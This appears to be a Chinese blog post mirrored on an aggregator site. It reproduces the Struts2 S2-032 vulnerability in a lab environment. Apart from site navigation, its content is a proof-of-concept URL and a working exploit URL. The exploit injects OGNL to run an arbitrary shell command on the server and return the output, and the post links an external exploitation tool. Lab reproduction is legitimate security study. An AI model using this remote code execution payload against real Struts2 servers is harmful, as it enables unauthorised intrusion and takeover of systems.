zoukankan      html  css  js  c++  java
  • 漏洞复现:Struts2 S2-032 漏洞环境

     Struts2 S2-032 漏洞环境

    http://vulapps.evalbug.com/s_struts2_s2-032/

    POC:

    http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086

    EXP:

    http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

    工具:http://qqhack8.blog.163.com/blog/static/1141479852014631102759126/

    附图:

    记得旧文章 便是新举子
  • 相关阅读:
    shiro注解,初始化资源和权限,会话管理
    shiro标签
    20个为前端开发者准备的文档和指南
    Canvas处理头像上传
    Chrome 实用调试技巧
    JS 代码编一个倒时器
    sql server优化
    在线图片压缩网站
    Request.QueryString
    C#网络爬虫
  • 原文地址:https://www.cnblogs.com/NBeveryday/p/8137964.html
Copyright © 2011-2022 走看看